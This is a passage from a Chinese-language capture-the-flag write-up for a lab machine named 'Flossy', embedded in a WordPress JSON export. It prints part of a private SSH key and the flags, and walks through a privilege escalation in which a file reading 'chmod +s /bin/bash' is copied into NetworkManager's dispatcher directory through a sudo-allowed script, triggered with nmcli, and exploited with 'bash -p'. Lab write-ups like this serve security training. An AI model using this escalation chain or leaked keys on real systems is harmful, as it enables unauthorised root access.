24iv2774tWGTwX\/JjVvB1sHrvv5eifRvz2JR+rRV\nXujBDzPdzQrkfxrOxkvAYr7VqR25EwH8GKl3Rf\/f19zc+ymaqcqwEld+7PY3vMIwJIi0Km\nHaOz9Usppl7864JZAjZvZu+C1hzouj+hXRFLlUZJGIw+N50C+vmaI0Py4ZDwubwisr+QdP\nsihk7GJChCzfs00X5BJ54mUf8o8ka7kjCmoh8niXsOtRGTrThX4U6dy29Fj7q\/NHXC9JG8\nn4j92V3sQJir4b7EKY9C4dwGM2J\/lT41DNluj1iAFj+FZgq\/a1BOiIGAgLOloJW9NtPN2M\nrdqBVbMaP7C2MRpybCSzVb7MOBk4ySynjk9xHoTgLLzQHHhlOBzua5zfiVrfDLt4v5AAAA\nwEAL+tJoildf450QGsY3elLbx9TaUw4uW9bH7YfZ+68eV+TbW5bAzQLV6s1g3Lru1oppVS\nUo2G4uPNyAVHVqU5YNKp0W4f2LfRrwYabEnzGyt5BGWBXHrRl16X2KKk3cuJ\/Lld0wY5aJ\niDZE8AL8Hkt6IeReFhCR3CMDOjoLasTnS0k+CLRG5\/E22bqy5Y\/r07eElt1ptdZXUnbILi\n9\/TQn0BgMJNbACry7TLYWf11SAW+HlDqvHIait9JJZVvdsCwAAAMEAxWqZ9pKSh1S0riAy\nKoQVkuZ5OW27JYZKmJO1MrkwIWO+UXpXyrWCdh2grXLDmli1R688VE07xWg25ygtNR9w2d\nUhNYutFu7Mj8IDEVQ3MkQDozdFTNZUmx5cNUKADIbCt88Uwvsw6asQKWuQeyXivLPVkTLI\nVp3MD5e8t2jlt8Bprc52xQ3DG1HqgavwP6KSSDkirflegl\/I74MSEAyYJ24JqWDJwwOYqu\nYGdU5z4TsMm87m9dITdAYtl3fTvXpzAAAAwQDCce6pgoKJiodd1qNdFQzMMBZeP0SqnWUH\nvfNJdcKSgg8wJVEC1nupH8JZNUAuXQSUS0y1vqpVMgtvB\/ui4HBiyWFsHLg181vhGy880U\nHM28Q6oJt8Pi9yJ7iwMMKws5eoYQlV0pvQsh+I+4dhK\/v09DHLQ2iPSbaqAxUcRmkhN0VJ\naK3CMiTLcp06jECr7qKu3wJVsHZf5C36M5H1204Iuah851GpSCbmIZSgSd0BNvQQ2\/k5tW\njbk\/VAmeosQ0kAAAANc29waGllQGZsb3NzeQECAwQFBg==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n
    \u5c1d\u8bd5\u8fde\u63a5\uff1a<\/p>\n
    \"image-20240416150046508\"<\/div>
    \n
    \"image-20240416150106400\"<\/div><\/p>\n
    \u4fe1\u606f\u641c\u96c6<\/h3>\n
    \u256d\u2500sophie@flossy ~ \n\u2570\u2500$ whoami;id\nsophie\ncuid=1001(sophie) gid=1001(sophie) groups=1001(sophie),100(users)\n\u256d\u2500sophie@flossy ~ \n\u2570\u2500$ ls -la\ntotal 232\ndrwxr-xr-x  5 sophie sophie   4096 Apr 16 09:01 .\ndrwxr-xr-x  4 root   root     4096 Oct  6  2023 ..\n-rw-------  1 root   root      370 Oct 10  2023 .bash_history\n-rw-r--r--  1 sophie sophie    220 Oct  6  2023 .bash_logout\n-rw-r--r--  1 sophie sophie   3526 Oct  6  2023 .bashrc\ndrwxr-xr-x  3 sophie sophie   4096 Oct  6  2023 .local\n-rwxr-----  1 root   sophie    962 Oct  6  2023 network\ndrwxr-xr-x 12 sophie sophie   4096 Apr 16 09:00 .oh-my-zsh\n-rw-r--r--  1 sophie sophie    807 Oct  6  2023 .profile\n-rw-r--r--  1 sophie sophie     66 Oct  7  2023 .selected_editor\ndrwx------  2 sophie sophie   4096 Oct 10  2023 .ssh\n-rwxr-xr-x  1 sophie sophie    630 Oct 10  2023 SSHKeySync\n-rwx------  1 sophie sophie     33 Oct 10  2023 user.txt\n-rw-r--r--  1 sophie sophie  51810 Apr 16 09:00 .zcompdump-flossy-5.9\n-r--r--r--  1 sophie sophie 119920 Apr 16 09:00 .zcompdump-flossy-5.9.zwc\n-rw-------  1 sophie sophie     68 Apr 16 09:01 .zsh_history\n-rw-r--r--  1 sophie sophie   3890 Oct  6  2023 .zshrc\n\u256d\u2500sophie@flossy ~ \n\u2570\u2500$ cat user.txt \n8926c8ba832369c1dc13eed7880585c6\n\u256d\u2500sophie@flossy ~ \n\u2570\u2500$ sudo -l\nMatching Defaults entries for sophie on flossy:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser sophie may run the following commands on flossy:\n    (ALL : ALL) NOPASSWD: \/home\/sophie\/network*\n\u256d\u2500sophie@flossy ~ \n\u2570\u2500$ file network\nnetwork: Bourne-Again shell script, ASCII text executable\n\u256d\u2500sophie@flossy ~ \n\u2570\u2500$ cat network \n#!\/bin\/bash\nconnected_ip(){\n        connection_type=TCP\n        champ=2\n        ignores=LISTEN\n        lsof_args=-ni\n\n        port_local="[0-9][0-9][0-9][0-9][0-9]->"\n\n        lsof "$lsof_args" | grep $connection_type | grep -v "$ignores" |\n        awk '{print $9}' | cut -d : -f $champ | sort | uniq |\n        sed s\/"^$port_local"\/\/\n }\n\ndispatcher() {\n    for s in \/opt\/*; do\n        if [ -f "$s" ]; then\n            d="\/etc\/NetworkManager\/dispatcher.d\/$(basename $s)"\n            if [ ! -f "$d" ] || [ "$s" -nt "$d" ]; then\n                return 0\n            fi\n        fi\n    done\n    return 1\n}\n\nupdate() {\n    if [[ -z $(find \/opt -type f) ]] ; then\n      exit 0\n    else\n      echo "Updating scripts."\n      cp \/opt\/* \/etc\/NetworkManager\/dispatcher.d\/\n      chmod +x \/etc\/NetworkManager\/dispatcher.d\/*\n      echo "Scripts updated."\n    fi\n}\n\ncase "${1}" in\nip)   connected_ip ;;\ndisp) dispatcher ; update ;;\n*)    echo "Usage: .\/$0 option" ;;\nesac<\/code><\/pre>\n
    \u770b\u5230\u90a3\u4e2aupdata\u4e86\u5417\uff1f\u53ef\u4ee5\u8fdb\u884c\u5229\u7528\uff0c\u4ed6\u5c06\/opt<\/code>\u4e0b\u7684\u6240\u6709\u6587\u4ef6\u62f7\u8d1d\u5230\/etc\/NetworkManager\/dispatcher.d\/<\/code>\uff0c\u5e76\u4e14\u8d4b\u4e88\u6267\u884c\u6743\u9650\uff0c\u5c1d\u8bd5\u6784\u9020\u6267\u884c\uff1a<\/p>\n
    \u256d\u2500sophie@flossy \/opt \n\u2570\u2500$ ls\nexp\n\u256d\u2500sophie@flossy \/opt \n\u2570\u2500$ chmod +x exp\n\u256d\u2500sophie@flossy \/opt \n\u2570\u2500$ head exp \nchmod +s \/bin\/bash\n\u256d\u2500sophie@flossy \/opt \n\u2570\u2500$ sudo -l                     \nMatching Defaults entries for sophie on flossy:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser sophie may run the following commands on flossy:\n    (ALL : ALL) NOPASSWD: \/home\/sophie\/network*\n\u256d\u2500sophie@flossy \/opt \n\u2570\u2500$ sudo \/home\/sophie\/network disp\nUpdating scripts.\nScripts updated.\n\u256d\u2500sophie@flossy \/opt \n\u2570\u2500$ ls -l \/bin\/bash               \n-rwxr-xr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash\n\u256d\u2500sophie@flossy \/opt \n\u2570\u2500$ cd \/etc\/NetworkManager\/dispatcher.d\/    \n\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ ls -la         \ntotal 28\ndrwxr-xr-x 5 root root 4096 Apr 16 09:11 .\ndrwxr-xr-x 7 root root 4096 Oct  6  2023 ..\n-rwxr-xr-x 1 root root 2293 Mar  9  2023 01-ifupdown\n-rwxr-xr-x 1 root root   19 Apr 16 09:11 exp\ndrwxr-xr-x 2 root root 4096 Mar  9  2023 no-wait.d\ndrwxr-xr-x 2 root root 4096 Mar  9  2023 pre-down.d\ndrwxr-xr-x 2 root root 4096 Mar  9  2023 pre-up.d\n\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ .\/exp                               \nchmod: changing permissions of '\/bin\/bash': Operation not permitted\n\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ service networking restart1 \u21b5\nzsh: command not found: service\n\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ \/etc\/NetworkManager\/dispatcher.d restart\nzsh: permission denied: \/etc\/NetworkManager\/dispatcher.d<\/code><\/pre>\n
    \"image-20240416151814667\"<\/div><\/p>\n
    \u6309\u7167\u76f8\u5e94\u547d\u4ee4\u67e5\u770b\u4e00\u4e0b\u6743\u9650\uff1a<\/p>\n
    \u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ nmcli general status                                                                                                                          130 \u21b5\nSTATE      CONNECTIVITY  WIFI-HW  WIFI     WWAN-HW  WWAN    \nconnected  unknown       missing  enabled  missing  enabled \n\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ nmcli general hostname\nflossy\n\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ nmcli general permissions\nPERMISSION                                                        VALUE \norg.freedesktop.NetworkManager.checkpoint-rollback                auth  \norg.freedesktop.NetworkManager.enable-disable-connectivity-check  no    \norg.freedesktop.NetworkManager.enable-disable-network             no    \norg.freedesktop.NetworkManager.enable-disable-statistics          no    \norg.freedesktop.NetworkManager.enable-disable-wifi                no    \norg.freedesktop.NetworkManager.enable-disable-wimax               no    \norg.freedesktop.NetworkManager.enable-disable-wwan                no    \norg.freedesktop.NetworkManager.network-control                    yes   \norg.freedesktop.NetworkManager.reload                             auth  \norg.freedesktop.NetworkManager.settings.modify.global-dns         auth  \norg.freedesktop.NetworkManager.settings.modify.hostname           auth  \norg.freedesktop.NetworkManager.settings.modify.own                auth  \norg.freedesktop.NetworkManager.settings.modify.system             auth  \norg.freedesktop.NetworkManager.sleep-wake                         no    \norg.freedesktop.NetworkManager.wifi.scan                          auth  \norg.freedesktop.NetworkManager.wifi.share.open                    no    \norg.freedesktop.NetworkManager.wifi.share.protected               no<\/code><\/pre>\n
    \u7136\u540e\u770b\u5230\uff1a   <\/p>\n
    \"image-20240416152108792\"<\/div><\/p>\n
    \u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ nmcli connection up lo\nConnection successfully activated (D-Bus active path: \/org\/freedesktop\/NetworkManager\/ActiveConnection\/2)\n\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ ls -l \/bin\/bash \n-rwsr-sr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash<\/code><\/pre>\n
    \u770b\u5230\u6267\u884c\u6210\u529f\u8fa3\uff01\uff01\uff01<\/p>\n
    \u5c1d\u8bd5\u83b7\u53d6flag\uff01\uff01\uff01\uff01<\/p>\n
    \u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ bash -p\nbash-5.2# whoami;id\nroot\nuid=1001(sophie) gid=1001(sophie) euid=0(root) egid=0(root) groups=0(root),100(users),1001(sophie)\nbash-5.2# ls -la\ntotal 28\ndrwxr-xr-x 5 root root 4096 Apr 16 09:11 .\ndrwxr-xr-x 7 root root 4096 Oct  6  2023 ..\n-rwxr-xr-x 1 root root 2293 Mar  9  2023 01-ifupdown\n-rwxr-xr-x 1 root root   19 Apr 16 09:11 exp\ndrwxr-xr-x 2 root root 4096 Mar  9  2023 no-wait.d\ndrwxr-xr-x 2 root root 4096 Mar  9  2023 pre-down.d\ndrwxr-xr-x 2 root root 4096 Mar  9  2023 pre-up.d\nbash-5.2# cd \/root\nbash-5.2# ls -la\ntotal 40\ndrwx------  6 root root 4096 Apr 16 07:33 .\ndrwxr-xr-x 18 root root 4096 Jul 22  2023 ..\nlrwxrwxrwx  1 root root    9 Jun 15  2023 .bash_history -> \/dev\/null\n-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc\ndrwxr-xr-x  3 root root 4096 Oct  6  2023 .local\ndrwxr-xr-x  4 root root 4096 Oct 10  2023 .npm\ndrwxr-xr-x 12 root root 4096 Sep 19  2023 .oh-my-zsh\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-r--r--  1 root root   33 Oct  7  2023 root.txt\ndrwx------  2 root root 4096 Oct 10  2023 .ssh\n-rw-r--r--  1 root root 3890 Jul 22  2023 .zshrc\nbash-5.2# cat root.txt \n355cec17306ab25389f376ef4a21422e<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
    Flossy \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.104 — -A Open 1 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-572","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/572","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=572"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/572\/revisions"}],"predecessor-version":[{"id":573,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/572\/revisions\/573"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=572"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=572"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=572"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}